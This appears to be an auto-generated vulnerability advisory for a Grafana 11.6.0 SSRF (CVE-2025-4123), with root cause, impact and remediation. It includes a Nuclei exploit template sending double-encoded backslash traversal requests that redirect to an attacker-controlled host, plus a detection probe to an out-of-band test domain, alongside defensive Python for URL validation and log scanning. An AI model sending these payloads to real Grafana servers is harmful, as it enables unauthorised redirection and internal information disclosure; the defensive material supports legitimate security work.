[webapps] Grafana 11.6.0 - SSRF
CVE-2025-4123
Grafana 11.6.0 has an SSRF vulnerability that can be used to probe internal network resources.
High · CVSS 7.5

📋 Vulnerability Summary

| CVE | CVE-2025-4123 |
|---|---|
| Vulnerability type | Server-Side Request Forgery (SSRF) |
| Affected version | Grafana 11.6.0 |
| Severity | High · CVSS 7.5 |
| Published | 2026-04-06 |
| Submitter | Beatriz Fresno Naumova |
| Source | Exploit-DB original ↗ |
🔬 Root Cause
The vulnerability lies in a Grafana API endpoint or feature that does not adequately filter or allowlist user-supplied URLs, so the server can be induced to issue HTTP requests to internal addresses chosen by the attacker.

🎯 Attack Scenario
1. The attacker logs in to Grafana or finds an endpoint that needs no authentication.
2. The attacker builds a URL request containing an internal IP address or a special protocol.
3. The attacker sends the malicious request to the target endpoint; the Grafana server issues the request and returns the response, disclosing internal information.

💥 Impact
Through the SSRF an attacker can map the internal network, reach internal management pages or cloud metadata endpoints, and potentially obtain sensitive information.
⚔️ Nuclei Exploit Template
Below is the exploit template in standard Nuclei v3 format; it can be used directly to verify the vulnerability:

```yaml
id: CVE-2025-4123-exploit

info:
  name: Grafana 11.2.0 - 11.6.0 SSRF Exploit
  author: Beatriz Fresno Naumova
  severity: high
  description: Exploits an SSRF vulnerability in Grafana's render/public endpoint. An attacker can cause the server to perform requests to attacker-controlled hosts or induce redirections, potentially leading to information disclosure.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4123
  metadata:
    verified: true
    shodan-query: title:"Grafana"
    fofa-query: app="Grafana"
    component: Grafana
    version: 11.2.0 - 11.6.0
  tags: grafana,ssrf,cve,cve2025

variables:
  attacker_host: "{{attacker_host}}"
  attacker_port: "80"

http:
  - raw:
      - |
        GET /render/public/..%252f%255C{{attacker_host}}%252f%253F%252f..%252f.. HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
        Connection: close
        Accept-Encoding: gzip
      - |
        GET /public/..%2F%5C{{attacker_host}}%2F%3f%2F..%2F.. HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19
        Connection: close
        Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255C{{attacker_host}}%25252f%25253F%25252f..%25252f..
        Accept-Encoding: gzip

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "plugin setting is not configured") == false'
          - 'status_code != 404'
          - 'status_code != 502'
        condition: and
```

🔍 Nuclei Detection Template
Below is the detection template, used to determine whether a target is affected:
```yaml
id: CVE-2025-4123-detection

info:
  name: Grafana 11.2.0 - 11.6.0 SSRF Detection
  author: Beatriz Fresno Naumova
  severity: high
  description: Detects if Grafana is running a version within the vulnerable range (11.2.0 - 11.6.0) and if the /render/public endpoint is accessible.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4123
  metadata:
    verified: true
    shodan-query: title:"Grafana"
    fofa-query: app="Grafana"
    component: Grafana
    version: 11.2.0 - 11.6.0
  tags: grafana,ssrf,cve,cve2025

http:
  - method: GET
    path:
      - '{{BaseURL}}/api/health'
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Grafana") == true'
          - 'contains(body, "\"version\"") == true'
        condition: and
    extractors:
      - type: regex
        part: body
        regex:
          - '"version": ?"([0-9]+\.[0-9]+\.[0-9]+)"'
          - '"database": ?".*?"'
        internal: true

  - method: GET
    path:
      - '{{BaseURL}}/render/public/..%252f%255Ctest.oastify.com%252f%253F%252f..%252f..'
    matchers:
      - type: word
        words:
          - 'plugin setting is not configured'
          - 'Image Renderer'
          - 'open redirect'
        condition: or
    extractors:
      - type: regex
        part: body
        regex:
          - '(Grafana|grafana) (v[0-9]+\.[0-9]+\.[0-9]+|[0-9]+\.[0-9]+\.[0-9]+)'
```

🛡️ Remediation
Upgrade to a fixed Grafana release newer than 11.6.0; strictly allowlist the URLs the server is allowed to request and block requests to private address ranges.
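One way to implement the allowlist and private-range restriction from the remediation in application code, as an added Python example that is not from this page, Exploit-DB or Grafana's own code base: it rejects non-HTTP schemes, backslashes (raw or percent-encoded, which the traversal above relies on), userinfo, localhost names, hosts outside an optional allowlist, and any address, whether a literal or a resolved one, that falls in a loopback, link-local, private, CGNAT, multicast or reserved range. The `FAKE_DNS` table, the `example.invalid` hostnames and their address mappings are constructed for the example so that it runs offline.

```python
import ipaddress
from urllib.parse import unquote, urlsplit

# Address ranges an outbound fetch must never reach. Documentation ranges
# (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) are deliberately absent so
# the constructed "external" sample below is allowed.
DENY_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16",   # link-local; cloud metadata services live here
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]

# Constructed stand-in for DNS; a real deployment would call socket.getaddrinfo.
FAKE_DNS = {
    "www.example.invalid": ["203.0.113.10"],
    "intranet.example.invalid": ["10.1.2.3"],
    "rebind.example.invalid": ["203.0.113.10", "127.0.0.1"],
}

def fake_resolver(hostname):
    return FAKE_DNS.get(hostname, [])

def ip_denied(ip_str):
    """True if the address is in a denied range; IPv4-mapped IPv6 literals
    such as ::ffff:127.0.0.1 are unwrapped first so they cannot slip past."""
    ip = ipaddress.ip_address(ip_str)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in DENY_NETWORKS)

def validate_target(url, resolver, allowed_hosts=None):
    """Return (ok, detail). On success detail is the list of addresses that
    were checked; the caller should connect to one of those rather than
    resolving the name again, so a later DNS answer cannot swap in an
    internal address."""
    # Backslashes, even behind several encoding layers, are rejected outright:
    # URL parsers disagree on whether '\' delimits the authority, which is the
    # confusion the traversal above exploits.
    decoded = url
    for _ in range(3):
        decoded = unquote(decoded)
    if "\\" in decoded:
        return False, "backslash in URL"
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme not allowed: {parts.scheme!r}"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if host == "localhost" or host.endswith(".localhost"):
        return False, "localhost name"
    if allowed_hosts is not None and host not in allowed_hosts:
        return False, f"host not on allowlist: {host}"
    try:
        addresses = [str(ipaddress.ip_address(host))]   # IP literal
    except ValueError:
        addresses = resolver(host)                       # DNS name
        if not addresses:
            return False, f"host does not resolve: {host}"
    for addr in addresses:
        if ip_denied(addr):
            return False, f"resolves to a denied address: {addr}"
    return True, addresses

if __name__ == "__main__":
    for candidate in ("http://www.example.invalid/api/health",
                      "http://intranet.example.invalid/",
                      "http://169.254.169.254/",
                      "http://[::ffff:127.0.0.1]/",
                      "http://www.example.invalid/..%255C",
                      "http://rebind.example.invalid/"):
        print(candidate, "->", validate_target(candidate, fake_resolver))
```

The check runs every resolved address, not just the first, so a name that returns one external and one internal record is refused; that is the simplest defence against multi-answer rebinding, and pinning the validated address at connect time covers the time-of-check gap. Pass `allowed_hosts` to enforce a strict allowlist on top of the range denylist, which is the configuration the remediation recommends.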
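For instances that cannot be upgraded immediately, an added Python example (not from this page or Exploit-DB) that scans web-server access-log lines for the request shape the two templates above send: it percent-decodes each request target a bounded number of times so the single- and double-encoded variants normalize to the same string, folds backslashes to slashes, and flags any `..` segment under `/public/` or `/render/public/`, where the static-asset handler has no legitimate use for one. The log lines and the host `example.invalid` are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined-log style); NOT real traffic.
# Lines 1 and 2 mirror the two request shapes in the templates above, with
# the placeholder host example.invalid; the rest are ordinary Grafana traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Apr/2026:10:01:12 +0000] "GET /render/public/..%252f%255Cexample.invalid%252f%253F%252f..%252f.. HTTP/1.1" 302 0
10.0.0.5 - - [06/Apr/2026:10:01:13 +0000] "GET /public/..%2F%5Cexample.invalid%2F%3f%2F..%2F.. HTTP/1.1" 302 0
10.0.0.7 - - [06/Apr/2026:10:02:00 +0000] "GET /public/img/grafana_icon.svg HTTP/1.1" 200 1234
10.0.0.7 - - [06/Apr/2026:10:02:01 +0000] "GET /api/health HTTP/1.1" 200 54
10.0.0.9 - - [06/Apr/2026:10:03:00 +0000] "GET /render/d-solo/abc/panel?panelId=2 HTTP/1.1" 200 9000
"""

REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"'
)
MONITORED_PREFIXES = ("/render/public/", "/public/")

def normalize(target, max_rounds=3):
    """Collapse encoding layers so single- and double-encoded variants compare
    equal: percent-decode until the string stops changing (bounded), then fold
    backslashes to slashes, since the traversal depends on '\\' being read as a
    path separator."""
    decoded = target
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\\", "/")

def is_traversal_under_public(normalized):
    """A '..' segment under /public/ or /render/public/ is never a legitimate
    static-asset request."""
    if not normalized.startswith(MONITORED_PREFIXES):
        return False
    return ".." in normalized.split("/")

def find_suspicious(log_text):
    """Return (line_number, client, normalized_target) for each hit."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        norm = normalize(m.group("target"))
        if is_traversal_under_public(norm):
            hits.append((n, m.group("client"), norm))
    return hits

if __name__ == "__main__":
    for n, client, target in find_suspicious(SAMPLE_LOG):
        print(f"line {n}: {client} -> {target}")
```

Matching on the normalized form rather than on the literal `%252f%255C` string is what keeps the rule from being bypassed by a different encoding depth or mixed-case hex; the bounded decode loop also means a pathological input cannot make the scanner loop indefinitely.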
⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 07:42 | Source: Exploit-DB